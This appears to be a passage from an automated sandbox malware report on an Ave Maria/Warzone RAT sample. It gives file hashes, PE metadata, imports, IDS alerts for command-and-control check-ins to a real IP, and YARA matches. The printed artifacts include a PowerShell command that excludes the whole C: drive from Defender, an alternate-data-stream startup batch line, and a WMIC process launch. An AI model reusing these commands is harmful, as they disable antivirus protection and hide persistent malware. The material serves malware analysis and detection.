                    SSDEEP:3:QwZ2vOUrKaM6eNGRjDWXp5cViEaKC5SufyM1K/RFofD6tRQLRWLyLRHgn:QElPhxuWXp+NaZ5SuH1MUmt2FWLyS
                    MD5:C2E52EDB9BA6919C7D9F3CF0B88221E2
                    SHA1:9972112AF86B48E937E589E262D21BAD251A6010
                    SHA-256:FAE189421B6E7CC977F1D2A69D712C97B22E810B0AE3F2F4E258E1112694C560
                    SHA-512:FDDEDA3E5D597D086B9C4412621078B3D14B6624DF2B003CA3238E3BD03DE35AAF3E16F04339AC54B04A723F98E76F17D74263F7D1CCBCA92B6FD2C325014B3B
                    Malicious:true
                    Preview:for /F "usebackq tokens=*" %%A in ("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start") do %%A

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start

                    Download File
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):59
                    Entropy (8bit):4.2659637614761765
                    Encrypted:false
                    SSDEEP:3:eGAjGJwbZkREfcjMGERMQhM:ZuGJwi8cwGj
                    MD5:579E29CEC6BDE04C5C074D8311D6B884
                    SHA1:2FDFD4C6B8EB43A4C6F4C0D3998E4A5364221DFF
                    SHA-256:65138897F467ADF9FE20594326D724D2CD5B437D9AACF5F83721AF340F70CE3C
                    SHA-512:4011A9FD58C1DC8AA3ED79589D7232BBD06EB3FB32513D3C5B59B740ED89FDC9CCC9F3291812AFFF2CD679820BCD940AE3A49E41EBCBE20413821ACAD7C5191D
                    Malicious:true
                    Preview:wmic process call create '"C:\ProgramData:ApplicationData"'

                    C:\Users\user\Documents\20220515\PowerShell_transcript.910646.QaUfbtTD.20220515213758.txt

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):5045
                    Entropy (8bit):5.388024296986314
                    Encrypted:false
                    SSDEEP:96:BZmhQN5QqDo1ZBZFhQN5QqDo1ZqM6UjZVhQN5QqDo1ZwFEEqZN:9FTM
                    MD5:3E07E8924F7C65A903A2367B78CDBF93
                    SHA1:3DC700FAE2312E5FE2DA6F97838BF44E2EB7331F
                    SHA-256:459AC2BFD4CEA72230ACD72E11C941AA174D7820420FEE8C132DF10E4316392F
                    SHA-512:2FF33B7E0CECD2FBD94B5F0EB6882CD8A323E253F6DA74F83034889DBAAB07BA22E7B8FAD73804807619DB6C42A34CBC829A4759697973364DA3843952B245C1
                    Malicious:false
                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220515213818..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 316..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220515213818..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20220515214218..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclusi

                    C:\Users\user\Documents\20220515\PowerShell_transcript.910646.TABzkN2n.20220515213740.txt

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):5048
                    Entropy (8bit):5.388063371930918
                    Encrypted:false
                    SSDEEP:96:BZePhQN5sqDo1ZIwZ6hQN5sqDo1ZQM6UjZnhQN5sqDo1ZTFEEjZl:iSdKPq
                    MD5:A7C69A3C25CAFBE9F023AFF815477553
                    SHA1:27F02E22876CA925486635A175E81C7B7593A9F4
                    SHA-256:0079DBBC9539A71EB85FE5F33FE64A8F6E0EB2B07ED1C73E060CF0FC9FCFE19B
                    SHA-512:37523698E4897E3B3F70DD8541E21953C953AAA8DFED9BBF4C1F47C7188F42810DBB26880B3740A5281631F06B346B7A59553DF83533A9A8D781C906362DC3F0
                    Malicious:false
                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220515213757..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 5900..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220515213757..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20220515214020..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus

                    \Device\ConDrv

                    Download File
                    Process:C:\Windows\System32\wbem\WMIC.exe
                    File Type:ASCII text, with CRLF, CR line terminators
                    Category:dropped
                    Size (bytes):140
                    Entropy (8bit):5.001523394375711
                    Encrypted:false
                    SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys36JQAimXv:Yw7gJGWMXJXKSOdYiygKkXe/qeAiY
                    MD5:DA5950D62F7968DA1F66E3811A9061F9
                    SHA1:69B83F624AA9EC9EA09BE0E165499B436101F9EA
                    SHA-256:C09AF5F39B8BF613C007465A63F70E84766710CEE7FEB62780433C9D8C248AD7
                    SHA-512:6291C46BC66AEC7AEB973EE076146AF54C800A63F3F6F9C0EF01DA6535539E2F44FBF0BACBEAF66C4D34C4BE122AD728F62681E408FA710127120806D952DC9E
                    Malicious:false
                    Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ReturnValue = 9;..};....

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):4.278811521243932
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:SecuriteInfo.com.Variant.Jaik.73085.20962.exe
                    File size:2054656
                    MD5:35ed3fe203fabde1b0d353815f9a273b
                    SHA1:6a5e219fd96905b154295697ac6f72a13725f6a1
                    SHA256:8d4020bea8924365724ff2c7eaffa0541f0ac4712c6b0a4723c5f68858fa306c
                    SHA512:9657c11d07068f9e054bc701a0789e3918e4554f845b6cf6371299ce477fb17cef6f4ab97469becb5892bb66091435e1bfb187299a8d6722564813ec767b4cbb
                    SSDEEP:12288:ed05fRBi1vvXHdJUNoyiiguuJ2glmnGeNCrRcQc/PJcEj2uGn9bunQ7JiD4pa7+o:q1vfHUorlm9NCFcR/PJc4gbunQ
                    TLSH:47951910B3A15124F5F767FA66B54694887E3C811F2CE2CF4A850ADECA292F47C347A7
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.j.*.j.*.j.*...).g.*.../...*.....z.*...).~.*.../.V.*.....~.*...+.e.*.j.+...*...#.n.*.....k.*.j...k.*...(.k.*.Richj.*........

                    File Icon

                    Icon Hash:00828e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0x4187d0
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                    DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Time Stamp:0x627C3FE2 [Wed May 11 22:59:46 2022 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:f40b392a15f243aae9f6b24f04047e6e

                    Entrypoint Preview

                    Instruction
                    push ebp
                    mov ebp, esp
                    call 00007F63D0CF1EEDh
                    pop ebp
                    ret
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    push ebp
                    mov ebp, esp
                    push ecx
                    mov dword ptr [ebp-04h], ecx
                    mov esp, ebp
                    pop ebp
                    ret
                    int3
                    int3
                    int3
                    int3
                    int3
                    push ebp
                    mov ebp, esp
                    push ecx
                    mov eax, dword ptr [ebp+08h]
                    mov ecx, dword ptr [eax]
                    mov dword ptr [ebp-04h], ecx
                    mov eax, dword ptr [ebp-04h]
                    mov esp, ebp
                    pop ebp
                    ret
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    push ebp
                    mov ebp, esp
                    mov eax, dword ptr [ebp+08h]
                    push eax
                    call 00007F63D0CF2189h
                    add esp, 04h
                    pop ebp
                    ret
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    push ebp
                    mov ebp, esp
                    mov eax, dword ptr [ebp+08h]
                    push eax
                    call 00007F63D0CF2249h
                    add esp, 04h
                    test eax, eax
                    je 00007F63D0CF21B3h
                    int3
                    pop ebp
                    ret
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    push ebp
                    mov ebp, esp
                    mov eax, dword ptr [ebp+08h]
                    push eax
                    call 00007F63D0CF2229h
                    add esp, 04h
                    test eax, eax
                    je 00007F63D0CF21B9h
                    mov ecx, 00000041h
                    int 29h
                    pop ebp
                    ret
                    int3
                    int3
                    int3
                    int3
                    push ebp
                    mov ebp, esp
                    pop ebp
                    ret
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    push ebp
                    mov ebp, esp
                    mov eax, dword ptr [ebp+08h]
                    push eax
                    call 00007F63D0CF21F9h
                    add esp, 04h
                    test eax, eax
                    je 00007F63D0CF21BEh
                    mov ecx, dword ptr [ebp+08h]
                    push ecx

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc47800xa0.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1f40000x1040.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1f60000x60c4.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0xc13980x54.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0xc14800x18.rdata
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xc12d80x40.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x960000x2b0.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x948000x94800False0.348802149095data6.1898202899IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rdata0x960000x2f5f00x2f600False0.203645489776data4.42534631821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0xc60000x12d7e00x12a400False0.134401358183data2.31170755301IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .rsrc0x1f40000x10400x1200False0.351345486111data3.69129058144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x1f60000x60c40x6200False0.742665816327data6.70176669915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    TYPELIB0x1f41900x834dataEnglishUnited States
                    RT_DIALOG0x1f4ce00x1aedataEnglishUnited States
                    RT_STRING0x1f4e900x2edataEnglishUnited States
                    RT_VERSION0x1f49c80x314dataEnglishUnited States
                    RT_MANIFEST0x1f4ec00x17dXML 1.0 document textEnglishUnited States

                    Imports

                    DLLImport
                    KERNEL32.dllGetModuleHandleA, HeapSize, GetCommandLineA, MultiByteToWideChar, Sleep, GetLastError, SetEvent, LockResource, HeapReAlloc, RaiseException, FindResourceExW, IsDBCSLeadByte, LoadResource, FindResourceW, HeapAlloc, DecodePointer, HeapDestroy, GetProcAddress, DeleteCriticalSection, GetProcessHeap, GetModuleHandleW, WideCharToMultiByte, lstrcmpiA, TlsFree, CreateFileW, ReadConsoleW, GetCurrentThreadId, FlushFileBuffers, GetConsoleMode, GetConsoleCP, SetFilePointerEx, GetFileSizeEx, GetStringTypeW, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, HeapQueryInformation, SetConsoleCtrlHandler, WriteConsoleW, GetFileType, GetCurrentThread, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, InitializeCriticalSectionEx, GetModuleFileNameA, LeaveCriticalSection, VirtualAlloc, EnterCriticalSection, SetLastError, HeapFree, VirtualProtect, SizeofResource, ReadFile, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, WriteFile, GetStdHandle, ExitProcess, HeapValidate, GetModuleHandleExW, GetModuleFileNameW, VirtualQuery, GetSystemInfo, TlsSetValue, TlsGetValue, TlsAlloc, InterlockedFlushSList, RtlUnwind, GetSystemTimeAsFileTime, GetCurrentProcessId, QueryPerformanceCounter, GetStartupInfoW, TerminateProcess, SetUnhandledExceptionFilter, LoadLibraryExW, EncodePointer, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, GetCurrentProcess, FlushInstructionCache, IsProcessorFeaturePresent, VirtualFree, LoadLibraryExA, IsDebuggerPresent, OutputDebugStringW, CloseHandle, InitializeCriticalSectionAndSpinCount, ResetEvent, WaitForSingleObjectEx, CreateEventW, UnhandledExceptionFilter, FreeLibrary
                    USER32.dllCharUpperA, CreateDialogParamA, CharNextW, UnregisterClassA, SetWindowLongA, PostThreadMessageA, IsWindow, ShowWindow, MessageBoxA, GetClientRect, DestroyWindow, GetWindow, GetWindowRect, GetDC, SetWindowPos, MonitorFromWindow, MapWindowPoints, GetWindowLongA, DispatchMessageA, GetMonitorInfoA, GetParent, ReleaseDC, IsWindowVisible, SendMessageA, GetDlgItem, EnableWindow, CharNextA, GetMessageA
                    GDI32.dllGetTextExtentPoint32A
                    ADVAPI32.dllRegCloseKey, RegDeleteKeyA, RegCreateKeyExA, RegEnumKeyExA, RegQueryInfoKeyA, RegOpenKeyExA, RegSetValueExA
                    SHELL32.dllSHGetFileInfoA
                    ole32.dllStringFromGUID2, CoAddRefServerProcess, CoReleaseServerProcess, StringFromCLSID, CoInitialize, CoRevokeClassObject, CoUninitialize, CoCreateInstance, CoTaskMemFree, CoRegisterClassObject
                    OLEAUT32.dllSysAllocStringLen, UnRegisterTypeLib, LoadRegTypeLib, LoadTypeLib, VariantInit, RegisterTypeLib, SysAllocString, SysStringLen, VarUI4FromStr, SysFreeString, SetErrorInfo, CreateErrorInfo

                    Version Infos

                    DescriptionData
                    LegalCopyright Microsoft Corporation. All rights reserved.
                    InternalNameATLDUCK
                    FileVersion1, 0, 0, 1
                    CompanyName
                    ProductNameatlduck Module
                    OLESelfRegister
                    ProductVersion1, 0, 0, 1
                    FileDescriptionatlduck Module
                    OriginalFilenameATLDUCK.DLL
                    Translation0x0409 0x04b0

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    104.128.191.44192.168.2.38080496942841903 05/15/22-21:37:58.748904TCP2841903ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound)808049694104.128.191.44192.168.2.3
                    192.168.2.3104.128.191.444969480802834979 05/15/22-21:37:58.879218TCP2834979ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin496948080192.168.2.3104.128.191.44

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    May 15, 2022 21:37:58.681555033 CEST496948080192.168.2.3104.128.191.44
                    May 15, 2022 21:37:58.714667082 CEST808049694104.128.191.44192.168.2.3
                    May 15, 2022 21:37:58.715264082 CEST496948080192.168.2.3104.128.191.44
                    May 15, 2022 21:37:58.748903990 CEST808049694104.128.191.44192.168.2.3
                    May 15, 2022 21:37:58.874927044 CEST496948080192.168.2.3104.128.191.44
                    May 15, 2022 21:37:58.879218102 CEST496948080192.168.2.3104.128.191.44
                    May 15, 2022 21:37:58.966294050 CEST808049694104.128.191.44192.168.2.3
                    May 15, 2022 21:37:58.966352940 CEST496948080192.168.2.3104.128.191.44
                    May 15, 2022 21:37:59.051170111 CEST808049694104.128.191.44192.168.2.3
                    May 15, 2022 21:38:18.746695042 CEST808049694104.128.191.44192.168.2.3
                    May 15, 2022 21:38:18.750108957 CEST496948080192.168.2.3104.128.191.44
                    May 15, 2022 21:38:18.846959114 CEST808049694104.128.191.44192.168.2.3
                    May 15, 2022 21:38:38.766438961 CEST808049694104.128.191.44192.168.2.3
                    May 15, 2022 21:38:38.767307997 CEST496948080192.168.2.3104.128.191.44
                    May 15, 2022 21:38:38.844547033 CEST808049694104.128.191.44192.168.2.3
                    May 15, 2022 21:38:58.778517962 CEST808049694104.128.191.44192.168.2.3
                    May 15, 2022 21:38:58.779375076 CEST496948080192.168.2.3104.128.191.44
                    May 15, 2022 21:38:58.856599092 CEST808049694104.128.191.44192.168.2.3
                    May 15, 2022 21:39:18.791378021 CEST808049694104.128.191.44192.168.2.3
                    May 15, 2022 21:39:18.796629906 CEST496948080192.168.2.3104.128.191.44
                    May 15, 2022 21:39:18.874511957 CEST808049694104.128.191.44192.168.2.3
                    May 15, 2022 21:39:38.810094118 CEST808049694104.128.191.44192.168.2.3
                    May 15, 2022 21:39:38.810285091 CEST496948080192.168.2.3104.128.191.44
                    May 15, 2022 21:39:38.894669056 CEST808049694104.128.191.44192.168.2.3

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:21:37:28
                    Start date:15/05/2022
                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe"
                    Imagebase:0x940000
                    File size:2054656 bytes
                    MD5 hash:35ED3FE203FABDE1B0D353815F9A273B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.271131507.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.271131507.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.271207797.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.271207797.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.298671123.00000000035AF000.00000002.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.298671123.00000000035AF000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.271113826.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.271113826.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.271046859.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.271046859.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low

                    General

                    Target ID:1
                    Start time:21:37:36
                    Start date:15/05/2022
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:powershell Add-MpPreference -ExclusionPath C:\
                    Imagebase:0x9b0000
                    File size:430592 bytes
                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:high

                    General

                    Target ID:2
                    Start time:21:37:37
                    Start date:15/05/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7c9170000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Target ID:3
                    Start time:21:37:38
                    Start date:15/05/2022
                    Path:C:\ProgramData\windowupdate.exe
                    Wow64 process (32bit):true
                    Commandline:C:\ProgramData\windowupdate.exe
                    Imagebase:0xd30000
                    File size:2054656 bytes
                    MD5 hash:35ED3FE203FABDE1B0D353815F9A273B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.310518053.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.310518053.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
